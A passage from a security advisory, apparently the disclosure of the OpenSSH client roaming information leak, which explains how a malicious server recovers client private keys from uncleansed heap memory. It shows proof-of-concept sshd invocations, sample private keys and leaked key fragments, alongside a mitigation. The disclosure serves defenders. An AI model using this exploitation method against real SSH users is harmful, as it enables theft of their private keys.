\"out_last - out_start\";\n\n- \"out_start \u003e out_last\" (lines 205-206): out_buf is full (and out_start\n is exactly equal to \"out_last + 1\"), and the amount of data available\n in out_buf is indeed the entire out_buf_size;\n\n- \"out_start == out_last\" (lines 205-206): no data was ever written to\n out_buf (and both out_start and out_last are still equal to 0) because\n no data was ever sent to the server after roaming_reply() was called,\n but the client sends (leaks) the entire uninitialized out_buf to the\n server (line 214), as if out_buf_size bytes of data were available. \n\nIn order to successfully exploit this information leak and retrieve\nsensitive information from the OpenSSH client\u0027s memory (for example,\nprivate SSH keys, or memory addresses useful for further exploitation),\na malicious server needs to:\n\n- Massage the client\u0027s heap before roaming_reply() malloc()ates out_buf,\n and force malloc() to return a previously free()d but uncleansed chunk\n of sensitive information. The simple proof-of-concept in this advisory\n does not implement heap massaging. \n\n- Guess the client\u0027s get_snd_buf_size() in order to precisely control\n out_buf_size. OpenSSH \u003c 6.0 accepts out_buf sizes in the range (0,4G),\n and OpenSSH \u003e= 6.0 accepts sizes in the range (0,2M]. Sizes smaller\n than get_snd_buf_size() are attainable because roaming_reply() does\n not protect \"packet_get_int() + get_snd_buf_size()\" against integer\n wraparound. The proof-of-concept in this advisory attempts to derive\n the client\u0027s get_snd_buf_size() from the get_recv_buf_size() sent by\n the client to the server, and simply chooses a random out_buf_size. \n\n- Advise the client\u0027s resend_bytes() that all \"available\" bytes (the\n entire out_buf_size) are \"needed\" by the server, even if fewer bytes\n were actually written by the client to the server (because the server\n controls the \"*offset\" argument, and resend_bytes() does not protect\n \"needed = write_bytes - *offset\" against integer wraparound). \n\nFinally, a brief digression on a minor bug in resend_bytes(): on 64-bit\nsystems, where \"chunkend\" is a 32-bit signed integer, but \"out_buf\" and\n\"out_buf_size\" are 64-bit variables, \"out_buf + out_buf_size - chunkend\"\nmay point out-of-bounds, if chunkend is negative (if out_buf_size is in\nthe [2G,4G) range). This negative chunkend is then converted to a 64-bit\nsize_t greater than SSIZE_MAX when passed to atomicio(), and eventually\nreturns EFAULT when passed to write() (at least on Linux and OpenBSD),\nthus avoiding an out-of-bounds read from the OpenSSH client\u0027s memory. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure\n------------------------------------------------------------------------\n\nWe initially believed that this information leak in the OpenSSH client\u0027s\nroaming code would not allow a malicious SSH server to steal the\nclient\u0027s private keys, because:\n\n- the information leaked is not read from out-of-bounds memory, but from\n a previously free()d chunk of memory that is recycled to malloc()ate\n the client\u0027s roaming buffer out_buf;\n\n- private keys are loaded from disk into memory and freed by key_free()\n (old API, OpenSSH \u003c 6.7) or sshkey_free() (new API, OpenSSH \u003e= 6.7),\n and both functions properly cleanse the private keys\u0027 memory with\n OPENSSL_cleanse() or explicit_bzero();\n\n- temporary copies of in-memory private keys are freed by buffer_free()\n (old API) or sshbuf_free() (new API), and both functions attempt to\n cleanse these copies with memset() or bzero(). \n\nHowever, we eventually identified three reasons why, in our experiments,\nwe were able to partially or completely retrieve the OpenSSH client\u0027s\nprivate keys through this information leak (depending on the client\u0027s\nversion, compiler, operating system, heap layout, and private keys):\n\n(besides these three reasons, other reasons may exist, as suggested by\nthe CentOS and Fedora examples at the end of this section)\n\n1. If a private SSH key is loaded from disk into memory by fopen() (or\nfdopen()), fgets(), and fclose(), a partial or complete copy of this\nprivate key may remain uncleansed in memory. Indeed, these functions\nmanage their own internal buffers, and whether these buffers are\ncleansed or not depends on the OpenSSH client\u0027s libc (stdio)\nimplementation, but not on OpenSSH itself. \n\n- In all vulnerable OpenSSH versions, SSH\u0027s main() function calls\n load_public_identity_files(), which loads the client\u0027s public keys\n with fopen(), fgets(), and fclose(). Unfortunately, the private keys\n (without the \".pub\" suffix) are loaded first and then discarded, but\n nonetheless buffered in memory by the stdio functions. \n\n- In OpenSSH versions \u003c= 5.6, the load_identity_file() function (called\n by the client\u0027s public-key authentication method) loads a private key\n with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses\n fgets() and hence internal stdio buffering. \n\nInternal stdio buffering is the most severe of the three problems\ndiscussed in this section, although GNU/Linux is not affected because\nthe glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. \nBSD-based systems, on the other hand, are severely affected because they\nsimply malloc()ate and free() stdio buffers. For interesting comments on\nthis issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk\n\n2. In OpenSSH versions \u003e= 5.9, the client\u0027s load_identity_file()\nfunction (called by the public-key authentication method) read()s a\nprivate key in 1024-byte chunks that are appended to a growing buffer (a\nrealloc()ating buffer) with buffer_append() (old API) or sshbuf_put()\n(new API). Unfortunately, the repeated calls to realloc() may leave\npartial copies of the private key uncleansed in memory. \n\n- In OpenSSH \u003c 6.7 (old API), the initial size of such a growing buffer\n is 4096 bytes: if a private-key file is larger than 4K, a partial copy\n of this private key may remain uncleansed in memory (a 3K copy in a 4K\n buffer). Fortunately, only the file of a very large RSA key (for\n example, an 8192-bit RSA key) can exceed 4K. \n\n- In OpenSSH \u003e= 6.7 (new API), the initial size of a growing buffer is\n 256 bytes: if a private-key file is larger than 1K (the size passed to\n read()), a partial copy of this private key may remain uncleansed in\n memory (a 1K copy in a 1K buffer). For example, the file of a\n default-sized 2048-bit RSA key exceeds 1K. \n\nFor more information on this issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources\n\nhttps://cwe.mitre.org/data/definitions/244.html\n\n3. An OpenSSH growing-buffer that holds a private key is eventually\nfreed by buffer_free() (old API) or sshbuf_free() (new API), and both\nfunctions attempt to cleanse the buffer with memset() or bzero() before\nthey call free(). Unfortunately, an optimizing compiler may remove this\nmemset() or bzero() call, because the buffer is written to, but never\nagain read from (an optimization known as Dead Store Elimination). \n\nOpenSSH 6.6 is the only version that is not affected, because it calls\nexplicit_bzero() instead of memset() or bzero(). \n\nDead Store Elimination is the least severe of the three problems\nexplored in this section, because older GCC versions do not remove the\nmemset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5\nand Clang/LLVM do, however, remove it. For detailed discussions of this\nissue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations\n\nhttps://cwe.mitre.org/data/definitions/14.html\n\nhttps://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506\n\nFinally, for these three reasons, passphrase-encrypted SSH keys are\nleaked in their encrypted form, but an attacker may attempt to crack the\npassphrase offline. On the other hand, SSH keys that are available only\nthrough an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the\nundocumented option \"UseRoaming no\" to the system-wide configuration\nfile (usually /etc/ssh/ssh_config), or per-user configuration file\n(~/.ssh/config), or command-line (-o \"UseRoaming no\"). \n\n2. If an OpenSSH client is disconnected from an SSH server that offers\nroaming, it prints \"[connection suspended, press return to resume]\" on\nstderr, and waits for \u0027\\n\u0027 or \u0027\\r\u0027 on stdin (and not on the controlling\nterminal) before it reconnects to the server; advanced users may become\nsuspicious and press Control-C or Control-Z instead, thus avoiding the\ninformation leak:\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume]^Z\n[1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1\n\nHowever, SSH commands that use the local stdin to transfer data to the\nremote server are bound to trigger this reconnection automatically (upon\nreading a \u0027\\n\u0027 or \u0027\\r\u0027 from stdin). Moreover, these non-interactive SSH\ncommands (for example, backup scripts and cron jobs) commonly employ\npublic-key authentication and are therefore perfect targets for this\ninformation leak:\n\n$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.ls\"\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.tar\"\ntar: Removing leading `/\u0027 from member names\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n... \n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\nSimilarly, the SCP client uses the SSH client\u0027s stdin and stdout to\ntransfer data, and can be forced by a malicious SSH server to output a\ncontrol record that ends in \u0027\\n\u0027 (an error message in server-to-client\nmode, or file permissions in client-to-server mode); this \u0027\\n\u0027 is then\nread from stdin by the fgetc() call in wait_for_roaming_reconnect(), and\ntriggers an automatic reconnection that allows the information leak to\nbe exploited without user interaction:\n\n# env ROAMING=\"scp_mode sleep:1\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp\n$ [connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\nlost connection\n\n3. Although a man-in-the-middle attacker can reset the TCP connection\nbetween an OpenSSH client and an OpenSSH server (which does not support\nroaming), it cannot exploit the information leak without breaking server\nhost authentication or integrity protection, because it needs to:\n\n- first, append the \"resume@appgate.com\" algorithm name to the server\u0027s\n initial key exchange message;\n\n- second, in response to the client\u0027s \"roaming@appgate.com\" request,\n change the server\u0027s reply from failure to success. \n\nIn conclusion, an attacker who wishes to exploit this information leak\nmust convince its target OpenSSH client to connect to a malicious server\n(an unlikely scenario), or compromise a trusted server (a more likely\nscenario, for a determined attacker). \n\n4. In the client, wait_for_roaming_reconnect()\ncalls ssh_connect(), the same function that successfully established the\nfirst connection to the server; this function supports four different\nconnection methods, but each method contains a bug and may fail to\nestablish a second connection to the server:\n\n- In OpenSSH \u003e= 6.5 (released on January 30, 2014), the default\n ssh_connect_direct() method (a simple TCP connection) is called by\n wait_for_roaming_reconnect() with a NULL aitop argument, which makes\n it impossible for the client to reconnect to the server:\n\n 418 static int\n 419 ssh_connect_direct(const char *host, struct addrinfo *aitop,\n ... \n 424 int sock = -1, attempt;\n 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV];\n ... \n 430 for (attempt = 0; attempt \u003c connection_attempts; attempt++) {\n ... \n 440 for (ai = aitop; ai; ai = ai-\u003eai_next) {\n ... \n 470 }\n 471 if (sock != -1)\n 472 break; /* Successful connection. */\n 473 }\n 474\n 475 /* Return failure if we didn\u0027t get a successful connection. */\n 476 if (sock == -1) {\n 477 error(\"ssh: connect to host %s port %s: %s\",\n 478 host, strport, strerror(errno));\n 479 return (-1);\n 480 }\n\n Incidentally, this error() call displays stack memory from the\n uninitialized strport[] array, a byproduct of the NULL aitop:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n\n- The special ProxyCommand \"-\" communicates with the server through the\n client\u0027s stdin and stdout, but these file descriptors are close()d by\n packet_backup_state() at the beginning of wait_for_roaming_reconnect()\n and are never reopened again, making it impossible for the client to\n reconnect to the server. Moreover, the fgetc() that waits for \u0027\\n\u0027 or\n \u0027\\r\u0027 on the closed stdin returns EOF and forces the client to exit():\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/nc -e \"/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1\" 127.0.0.1 222\nPseudo-terminal will not be allocated because stdin is not a terminal. \nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that\n passes a connected file descriptor back to the client, but it calls\n fatal() while reconnecting to the server, because waitpid() returns\n ECHILD; indeed, the SIGCHLD handler (installed by SSH\u0027s main() after\n the first successful connection to the server) calls waitpid() before\n ssh_proxy_fdpass_connect() does:\n\n1782 static void\n1783 main_sigchld_handler(int sig)\n1784 {\n.... \n1789 while ((pid = waitpid(-1, \u0026status, WNOHANG)) \u003e 0 ||\n1790 (pid \u003c 0 \u0026\u0026 errno == EINTR))\n1791 ;\n1792\n1793 signal(sig, main_sigchld_handler);\n.... \n1795 }\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103 const char *proxy_command)\n 104 {\n ... \n 121 /* Fork and execute the proxy command. */\n 122 if ((pid = fork()) == 0) {\n ... \n 157 }\n 158 /* Parent. */\n ... \n 167 while (waitpid(pid, NULL, 0) == -1)\n 168 if (errno != EINTR)\n 169 fatal(\"Couldn\u0027t wait for child: %s\", strerror(errno));\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015\n\n$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand=\"/usr/bin/nc -F %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Couldn\u0027t wait for child: No child processes\n\n- The method ssh_proxy_connect() fork()s a standard ProxyCommand that\n connects the client to the server, but if a disconnection occurs, and\n the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is\n waiting for a \u0027\\n\u0027 or \u0027\\r\u0027 on stdin, EOF is returned (the underlying\n read() returns EINTR) and the client exit()s before it can reconnect\n to the server:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh -o ProxyCommand=\"/bin/nc %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n This behavior is intriguing, because (at least on Linux and BSD) the\n signal() call that installed the main_sigchld_handler() is supposed to\n be equivalent to a sigaction() call with SA_RESTART. However, portable\n versions of OpenSSH override signal() with mysignal(), a function that\n calls sigaction() without SA_RESTART. \n\n This last mitigating factor is actually a race-condition bug that\n depends on the ProxyCommand itself: for example, the client never\n fails to reconnect to the server when using Socat as a ProxyCommand,\n but fails occasionally when using Netcat. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\nvOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi\n/rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE\nK+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr\n+7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n\nUxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7\nqsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11\n1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV\npmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:1280\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-97ed9f59/infoleak\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:768\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-9448bb7f/infoleak\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\n... \n\n# env ROAMING=\"client_out_buf_size:1024\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-279f5e2b/infoleak\n... \niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n... \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:2048\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat 